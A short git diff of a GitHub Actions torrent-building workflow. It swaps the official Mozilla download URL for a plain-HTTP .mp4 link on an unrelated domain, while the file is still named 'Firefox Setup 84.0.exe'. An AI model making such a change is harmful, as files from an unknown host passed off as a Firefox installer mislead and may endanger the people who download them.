--- a/.github/workflows/torrent.yml
+++ b/.github/workflows/torrent.yml
@@ -7,7 +7,7 @@ on:
 env:
   name: "Firefox Setup 84.0"
   comment: "Firefox Setup 84.0"
-  url: "https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-US/win64/3fdd1318dfa06611263ee86c0c74dcd76fde4cf6763ea411e758b97a0578dee6/Firefox%20Setup%2084.0.exe"
+  url: "http://oyrenci-sesi.info/leech/files/ALGCAO.mp4"
   file_name: "Firefox Setup 84.0.exe"
   piece_size: 19 # Check the README.md for recommended piece size
       
